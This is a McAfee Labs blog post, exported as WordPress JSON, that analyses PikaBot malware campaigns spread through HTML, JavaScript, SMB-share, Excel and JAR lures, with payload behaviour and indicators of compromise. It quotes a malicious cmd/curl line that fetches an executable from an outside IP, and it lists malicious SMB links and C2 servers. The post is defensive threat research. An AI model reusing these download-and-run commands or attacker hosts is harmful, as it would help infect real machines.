{"id":187631,"date":"2024-04-02T11:12:55","date_gmt":"2024-04-02T18:12:55","guid":{"rendered":"https:\/\/www.mcafee.com\/blogs\/?p=187631"},"modified":"2024-04-02T11:22:11","modified_gmt":"2024-04-02T18:22:11","slug":"distinctive-campaign-evolution-of-pikabot-malware","status":"publish","type":"post","link":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/","title":{"rendered":"Distinctive Campaign Evolution of Pikabot Malware"},"content":{"rendered":"

Authored by Anuradha and Preksha<\/em><\/span><\/p>\n

Introduction<\/span><\/h2>\n

PikaBot is a malicious backdoor that has been active since early 2023. Its modular design is comprised of a loader and a core component. The core module performs malicious operations, allowing for the execution of commands and the injection of payloads from a command-and-control server. The malware employs a code injector to decrypt and inject the core module into a legitimate process. Notably, PikaBot employs distribution methods, campaigns, and behavior reminiscent of Qakbot.<\/span><\/p>\n

Distribution Methods<\/span><\/h1>\n

PikaBot, along with various other malicious loaders like QBot and DarkGate, heavily depends on email spam campaigns for distribution. Its initial access strategies are intricately crafted, utilizing geographically targeted spam emails tailored for specific countries. These emails frequently include links to external Server Message Block (SMB)<\/strong> shares hosting malicious zip files.<\/span><\/p>\n

SMB shares refer to resources or folders on a server or computer accessible to other devices or users on a network using the SMB protocol. The threat actors frequently exploit such shares for malware distribution. In this instance, the act of downloading and opening the provided zip file leads to PikaBot infection.<\/span><\/p>\n

Distinctive Campaigns<\/span><\/h2>\n

During February 2024, McAfee Labs observed a significant change in the campaigns that distribute Pikabot.<\/span><\/p>\n

Pikabot is distributed through multiple file types for various reasons, depending on the objectives and nature of the attack. Using multiple file types allows attackers to exploit diverse attack vectors. Different file formats may have different vulnerabilities, and different ways of detection by security software so attackers may try various formats to increase their chances of success and evade detection by bypassing specific security measures.<\/span><\/p>\n

Attackers often use file types that are commonly trusted by users, such as Zip or Office documents, to trick users into opening them. By using familiar file types, attackers increase the likelihood that their targets will interact with the malicious content. Malware authors use HTML with JavaScript features as attachments, a common technique, particularly when email formatting is converted to plain text, resulting in the attachment of the HTML content directly to the email. Attackers use SMB to propagate across the network and may specifically target SMB shares to spread their malware efficiently. Pikabot takes advantage of the MonikerLink<\/a> bug and attaches an SMB link in the Outlook mail itself.<\/span><\/p>\n

\"\"<\/span><\/center><\/p>\n

Figure 1. Distinctive Campaigns of Pikabot<\/strong><\/span><\/p>\n

Attackers demonstrated a diverse range of techniques and infection vectors in each campaign, aiming to deliver the Pikabot payload. Below we have summarized the infection vector that has been used in each campaign.<\/span><\/p>\n

    \n
  1. HTML<\/strong><\/span><\/li>\n
  2. Javascript<\/strong><\/span><\/li>\n
  3. SMB Share<\/strong><\/span><\/li>\n
  4. Excel<\/strong><\/span><\/li>\n
  5. JAR<\/strong><\/span><\/li>\n<\/ol>\n

    It is uncommon for an adversary to deploy so many attack vectors in the span of a month.<\/strong><\/span><\/p>\n

    Campaign Analysis<\/span><\/h3>\n

    In this section, a comprehensive breakdown of the analysis for each campaign is presented below.<\/span><\/p>\n

    1.HTML Campaign<\/span><\/h4>\n

    In this campaign, Pikabot is distributed through a zip file that includes an HTML file. This HTML file then proceeds to download a text file, ultimately resulting in the deployment of the payload.<\/strong><\/span><\/p>\n

    The below HTML code is a snippet from the malware where it is a properly aligned HTML that has a body meta redirection to a remote text file hosted at the specified URL. There are distractions in the HTML which are not rendered by the browser.<\/span><\/p>\n

    \"\"<\/span><\/center><\/p>\n

    Figure 2.HTML Code<\/strong><\/span><\/p>\n

    The above highlighted meta tag triggers an immediate refresh of the page and redirects the browser to the specified URL: ‘file:\/\/204.44.125.68\/mcqef\/yPXpC.txt’. This appears to be a file URL, pointing to a text file on a remote server.<\/span><\/p>\n

    Here are some reasons why an attacker might choose a meta tag refresh over traditional redirects:<\/span><\/p>\n

    Stealth and Evasion: Meta tag refreshes can be less conspicuous than HTTP redirects. Some security tools and detection mechanisms may be more focused on identifying and blocking known redirect patterns.<\/span><\/p>\n

    Client-Side Execution: Meta tag refreshes occur on the client side (in the user’s browser), whereas HTTP redirects are typically handled by the server. This may allow attackers to execute certain actions directly on the user’s machine, making detection and analysis more challenging.<\/span><\/p>\n

    Dynamic Behavior: Meta tag refreshes can be dynamically generated and inserted into web pages, allowing attackers to change the redirection targets more easily and frequently. This dynamic behavior can make it harder for security systems to keep up with the evolving threat landscape.<\/span><\/p>\n

    In this campaign, McAfee blocks the HTML file.<\/span><\/p>\n

    \"\"<\/span><\/center><\/p>\n

    Figure 3.HTML file<\/strong><\/span><\/p>\n

    2. Javascript Campaign<\/span><\/h4>\n

    Distributed through a compressed zip file, the package includes a .js file that subsequently initiates the execution of curl.exe to retrieve the payload.<\/span><\/p>\n

    Infection Chain:<\/strong><\/span><\/p>\n

    .zip->.js->curl->.exe<\/span><\/p>\n

    Code snippet of .js file:<\/strong><\/span><\/p>\n

    \"\"<\/span><\/center><\/p>\n

    Figure 4. Javascript Code<\/strong><\/span><\/p>\n

    When the JavaScript is executed, it triggers cmd.exe to generate directories on the C: drive and initiates curl.exe to download the payload.<\/span><\/p>\n

    Since the URL \u201chxxp:\/\/103.124.105.147\/KNaDVX\/.dat\u201d is inactive, the payload is not downloaded to the below location.<\/span><\/p>\n

    Commandline:<\/strong><\/span><\/p>\n

    ‘”C:\\Windows\\System32\\cmd.exe” \/c mkdir C:\\Dthfgjhjfj\\Rkfjsil\\Ejkjhdgjf\\Byfjgkgdfh & curl hxxp:\/\/103.124.105.147\/KNaDVX\/0.2642713404338389.dat –output C:\\Dthfgjhjfj\\Rkfjsil\\Ejkjhdgjf\\Byfjgkgdfh\\Ngjhjhjda.exe’<\/span><\/p>\n

    McAfee blocks both the javascript and the exe file thus rendering McAfee customers safe from this campaign.<\/span><\/p>\n

    \"\"<\/span><\/center><\/p>\n

    Figure 5. JS file<\/strong><\/span><\/p>\n

    \"\"<\/span><\/p>\n

    Figure 6. EXE file<\/strong><\/span><\/p>\n

    3<\/strong>.<\/strong> SMB share Campaign:<\/strong><\/span><\/h4>\n

    In this campaign, Malware leverages the MonikerLink<\/a> bug by distributing malware through email conversations with older thread discussions, wherein recipients receive a link to download the payload from an SMB share. The link is directly present in that Outlook mail.<\/span><\/p>\n

    Infection Chain:<\/strong><\/span><\/p>\n

    EML ->SMB share link->.zip->.exe<\/span><\/p>\n

    Spam Email:<\/strong><\/span><\/p>\n

    \"\"<\/span><\/center><\/p>\n

    Figure 7. Spam email with SMB share link<\/strong><\/span><\/p>\n

    SMB Share link: file:\/\/newssocialwork.com\/public\/FNFY.zip<\/span><\/p>\n

    In this campaign, McAfee successfully blocks the executable file downloaded from the SMB share.<\/strong><\/span><\/p>\n

    \"\"<\/span><\/center><\/p>\n

    Figure 8.<\/strong> EXE file<\/strong><\/span><\/p>\n

    \u00a0<\/strong>4: Ex<\/strong>cel Campaign<\/strong><\/span><\/h2>\n

    \"\"<\/span><\/center><\/p>\n

    Figure 9. Face in Excel<\/strong><\/span><\/p>\n

    Infection Chain:<\/strong><\/span><\/p>\n

    .zip >.xls > .js > .dll<\/span><\/p>\n

    This week, threat actors introduced a novel method to distribute their Pikabot malware. Targeted users received an Excel spreadsheet that prompted them to click on an embedded button to access “files from the cloud.”<\/span><\/p>\n

    Upon hovering over the “Open” button, we can notice an SMB file share link -file:\/\/\/\\\\85.195.115.20\\share\\reports_02.15.2024_1.js.<\/span><\/p>\n

    Bundled files in Excel:<\/strong><\/span><\/p>\n

    \"\"<\/span><\/center><\/p>\n

    Figure 10. Bundled files inside Excel<\/strong><\/span><\/p>\n

    The Excel file doesn’t incorporate any macros but includes a hyperlink directing to an SMB share for downloading the JavaScript file.<\/span><\/p>\n

    The hyperlink is present in the below relationship file.<\/span><\/p>\n

    \"\"<\/span><\/p>\n

    Figure 11. XML relationship file<\/strong><\/span><\/p>\n

    Content of relationship file:<\/span><\/p>\n

    \"\"<\/span><\/center><\/p>\n

    Figure 12.<\/strong> xl\/drawings\/_rels\/drawing1.xml.rels <\/strong><\/span><\/p>\n

    Code of JS file:<\/strong><\/span><\/p>\n

    \"\"<\/span><\/center><\/p>\n

    Figure 13. Obfuscated javascript code<\/strong><\/span><\/p>\n

    The JS file contains mostly junk codes and a small piece of malicious code which downloads the payload DLL file saved as \u201cnh.jpg\u201d.<\/span><\/p>\n

    \"\"<\/span><\/center><\/p>\n

    Figure 14. Calling regsvr32.exe<\/strong><\/span><\/p>\n

    The downloaded DLL payload is executed by regsvr32.exe.<\/span><\/p>\n

    In this campaign, McAfee blocks the XLSX file.<\/span><\/p>\n

    \"\"<\/span><\/center><\/p>\n

    Figure 15. XLSX file<\/strong><\/span><\/p>\n

    5.JAR<\/strong> Campaign<\/strong><\/span><\/h4>\n

    In this campaign, distribution was through a compressed zip file, the package includes a .jar file which on execution drops the DLL file as payload.<\/span><\/p>\n

    Infection Chain:<\/strong><\/span><\/p>\n

    .zip>.jar>.dll<\/span><\/p>\n

    On extraction, the below files are found inside the jar file.<\/span><\/p>\n

    \"\"<\/span><\/center><\/p>\n

    Figure 16. Extraction of JAR file<\/strong><\/span><\/p>\n

    The MANIFEST<\/strong> file indicates that hBHGHjbH.class<\/strong> serves as the Main-Class in the provided files.<\/span><\/p>\n

    The jar file on execution loads the file \u201c163520\u201d<\/strong> as a resource and drops it as .png<\/strong> to the %temp%<\/strong> location which is the payload DLL file.<\/span><\/p>\n

    \"\"<\/span><\/p>\n

    Figure 17. Payload with .png extension<\/strong><\/span><\/p>\n

    Following this, java.exe initiates the execution of regsvr32.exe to run the payload.<\/span><\/p>\n

    In this campaign, McAfee blocks both the JAR and DLL files.<\/span><\/p>\n

    \"\"<\/span><\/center><\/p>\n

    Figure 18. JAR file<\/strong><\/span><\/p>\n

    \"\"<\/span><\/center><\/p>\n

    Figure 19. DLL file<\/strong><\/span><\/p>\n

    Pikabot Payload Analysis:<\/span><\/h1>\n

    Pikabot loader:<\/span><\/h2>\n

    Due to a relatively high entropy of the resource section, the sample appears packed.<\/span><\/p>\n

    \"\"<\/span><\/p>\n

    Figure 20. Loader Entropy<\/strong><\/span><\/p>\n

    Initially, Malware allocates memory using VirtualAlloc (), and subsequently, it employs a custom decryption loop to decrypt the data, resulting in a PE file.<\/span>
    \n\"\"<\/span><\/p>\n

    \"\"<\/span><\/center><\/p>\n

    Figure 21. Decryption Loop<\/strong><\/span><\/p>\n

    \"\"<\/span><\/center><\/p>\n

    Figure 22. Decrypted to get the PE file<\/strong><\/span><\/p>\n

    Core Module:<\/span><\/h2>\n

    Once the data is decrypted, it proceeds to jump to the entry point of the new PE file. When this PE file gets executed, it injects the malicious content in ctfmon.exe with the command line argument “C:\\Windows\\SysWOW64\\ctfmon.exe -p 1234\u201d<\/span><\/p>\n

    \"\"<\/span><\/center><\/p>\n

    Figure 23. Injection with ctfmon.exe<\/strong><\/span><\/p>\n

    To prevent double infection, it employs a hardcoded mutex value {9ED9ADD7-B212-43E5-ACE9-B2E05ED5D524} by calling CreateMutexW(), followed by a call to GetLastError() to check the last error code.<\/span><\/p>\n

    \"\"<\/span><\/center><\/p>\n

    Figure 24. Mutex<\/strong><\/span><\/p>\n

    Network communication:<\/span><\/h2>\n

    Malware collects the data from the victim machine and sends it to the C2 server.<\/span><\/p>\n

    \"\"<\/span><\/center><\/p>\n

    Figure 25. Network activity<\/strong><\/span><\/p>\n

    PIKABOT performs network communication over HTTPS on non-traditional ports (2221, 2078, etc).<\/span><\/p>\n

    \"\"<\/span><\/center><\/p>\n

    Figure 26. Network activity<\/strong><\/span><\/p>\n

    C2 server communication:<\/span><\/h2>\n

    \"\"<\/span><\/center><\/p>\n

    Figure 27. C2 communication<\/strong><\/span><\/p>\n

    IOCs:<\/span><\/h1>\n

    C2 found in the payload are:<\/span><\/p>\n

    178.18.246.136:2078<\/span><\/p>\n

    86.38.225.106:2221<\/span><\/p>\n

    57.128.165.176:1372<\/span><\/p>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
    File Type<\/strong><\/span><\/td>\nSHA 256<\/strong><\/span><\/td>\n<\/tr>\n
    ZIP<\/span><\/td>\n800fa26f895d65041ddf12c421b73eea7f452d32753f4972b05e6b12821c863a<\/span><\/td>\n<\/tr>\n
    HTML<\/span><\/td>\n9fc72bdf215a1ff8c22354aac4ad3c19b98a115e448cb60e1b9d3948af580c82<\/span><\/td>\n<\/tr>\n
    ZIP<\/span><\/td>\n4c29552b5fcd20e5ed8ec72dd345f2ea573e65412b65c99d897761d97c35ebfd<\/span><\/td>\n<\/tr>\n
    JS<\/span><\/td>\n9a4b89276c65d7f17c9568db5e5744ed94244be7ab222bedd8b64f25695ef849<\/span><\/td>\n<\/tr>\n
    EXE<\/span><\/td>\n89dc50024836f9ad406504a3b7445d284e97ec5dafdd8f2741f496cac84ccda9<\/span><\/td>\n<\/tr>\n
    ZIP<\/span><\/td>\nf3f1492d65b8422125846728b320681baa05a6928fbbd25b16fa28b352b1b512<\/span><\/td>\n<\/tr>\n
    EXE<\/span><\/td>\naab0e74b9c6f1326d7ecea9a0de137c76d52914103763ac6751940693f26cbb1<\/span><\/td>\n<\/tr>\n
    XLSX<\/span><\/td>\nbcd3321b03c2cba73bddca46c8a509096083e428b81e88ed90b0b7d4bd3ba4f5<\/span><\/td>\n<\/tr>\n
    JS<\/span><\/td>\n49d8fb17458ca0e9eaff8e3b9f059a9f9cf474cc89190ba42ff4f1e683e09b72<\/span><\/td>\n<\/tr>\n
    ZIP<\/span><\/td>\nd4bc0db353dd0051792dd1bfd5a286d3f40d735e21554802978a97599205bd04<\/span><\/td>\n<\/tr>\n
    JAR<\/span><\/td>\nd26ab01b293b2d439a20d1dffc02a5c9f2523446d811192836e26d370a34d1b4<\/span><\/td>\n<\/tr>\n
    DLL<\/span><\/td>\n7b1c5147c903892f8888f91c98097c89e419ddcc89958a33e294e6dd192b6d4e<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

    \u00a0<\/strong><\/span><\/p>\n

     <\/p>\n","protected":false},"excerpt":{"rendered":"

    Authored by Anuradha and Preksha Introduction PikaBot is a malicious backdoor that has been active since early 2023. Its modular…<\/p>\n","protected":false},"author":695,"featured_media":188086,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[442],"tags":[],"coauthors":[4136],"class_list":["post-187631","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-mcafee-labs"],"acf":[],"yoast_head":"\nDistinctive Campaign Evolution of Pikabot Malware | McAfee Blog<\/title>\n<meta name=\"description\" content=\"Authored by Anuradha and Preksha Introduction PikaBot is a malicious backdoor that has been active since early 2023. Its modular design is comprised of a\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Distinctive Campaign Evolution of Pikabot Malware | McAfee Blog\" \/>\n<meta property=\"og:description\" content=\"Authored by Anuradha and Preksha Introduction PikaBot is a malicious backdoor that has been active since early 2023. Its modular design is comprised of a\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/\" \/>\n<meta property=\"og:site_name\" content=\"McAfee Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:published_time\" content=\"2024-04-02T18:12:55+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-04-02T18:22:11+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_080923-1.png\" \/>\n\t<meta property=\"og:image:width\" content=\"300\" \/>\n\t<meta property=\"og:image:height\" content=\"200\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"McAfee Labs\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@McAfee_Labs\" \/>\n<meta name=\"twitter:site\" content=\"@McAfee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"McAfee Labs\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/\"},\"author\":{\"name\":\"McAfee Labs\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\"},\"headline\":\"Distinctive Campaign Evolution of Pikabot Malware\",\"datePublished\":\"2024-04-02T18:12:55+00:00\",\"dateModified\":\"2024-04-02T18:22:11+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/\"},\"wordCount\":1644,\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_080923-1.png\",\"articleSection\":[\"McAfee Labs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/\",\"name\":\"Distinctive Campaign Evolution of Pikabot Malware | McAfee Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_080923-1.png\",\"datePublished\":\"2024-04-02T18:12:55+00:00\",\"dateModified\":\"2024-04-02T18:22:11+00:00\",\"description\":\"Authored by Anuradha and Preksha Introduction PikaBot is a malicious backdoor that has been active since early 2023. Its modular design is comprised of a\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#primaryimage\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_080923-1.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_080923-1.png\",\"width\":300,\"height\":200},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Blog\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Other Blogs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"McAfee Labs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"Distinctive Campaign Evolution of Pikabot Malware\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"name\":\"McAfee Blog\",\"description\":\"Internet Security News\",\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\",\"name\":\"McAfee\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"width\":1286,\"height\":336,\"caption\":\"McAfee\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee\",\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.youtube.com\/McAfee\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\",\"name\":\"McAfee Labs\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"caption\":\"McAfee Labs\"},\"description\":\"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.\",\"sameAs\":[\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee_Labs\"],\"url\":\"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Distinctive Campaign Evolution of Pikabot Malware | McAfee Blog","description":"Authored by Anuradha and Preksha Introduction PikaBot is a malicious backdoor that has been active since early 2023. Its modular design is comprised of a","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"en_US","og_type":"article","og_title":"Distinctive Campaign Evolution of Pikabot Malware | McAfee Blog","og_description":"Authored by Anuradha and Preksha Introduction PikaBot is a malicious backdoor that has been active since early 2023. Its modular design is comprised of a","og_url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/","og_site_name":"McAfee Blog","article_publisher":"https:\/\/www.facebook.com\/McAfee\/","article_author":"https:\/\/www.facebook.com\/McAfee\/","article_published_time":"2024-04-02T18:12:55+00:00","article_modified_time":"2024-04-02T18:22:11+00:00","og_image":[{"width":300,"height":200,"url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_080923-1.png","type":"image\/png"}],"author":"McAfee Labs","twitter_card":"summary_large_image","twitter_creator":"@McAfee_Labs","twitter_site":"@McAfee","twitter_misc":{"Written by":"McAfee Labs","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#article","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/"},"author":{"name":"McAfee Labs","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad"},"headline":"Distinctive Campaign Evolution of Pikabot Malware","datePublished":"2024-04-02T18:12:55+00:00","dateModified":"2024-04-02T18:22:11+00:00","mainEntityOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/"},"wordCount":1644,"publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_080923-1.png","articleSection":["McAfee Labs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/","url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/","name":"Distinctive Campaign Evolution of Pikabot Malware | McAfee Blog","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#primaryimage"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_080923-1.png","datePublished":"2024-04-02T18:12:55+00:00","dateModified":"2024-04-02T18:22:11+00:00","description":"Authored by Anuradha and Preksha Introduction PikaBot is a malicious backdoor that has been active since early 2023. Its modular design is comprised of a","breadcrumb":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#primaryimage","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_080923-1.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_080923-1.png","width":300,"height":200},{"@type":"BreadcrumbList","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https:\/\/www.mcafee.com\/blogs\/"},{"@type":"ListItem","position":2,"name":"Other Blogs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/"},{"@type":"ListItem","position":3,"name":"McAfee Labs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/"},{"@type":"ListItem","position":4,"name":"Distinctive Campaign Evolution of Pikabot Malware"}]},{"@type":"WebSite","@id":"https:\/\/www.mcafee.com\/blogs\/#website","url":"https:\/\/www.mcafee.com\/blogs\/","name":"McAfee Blog","description":"Internet Security 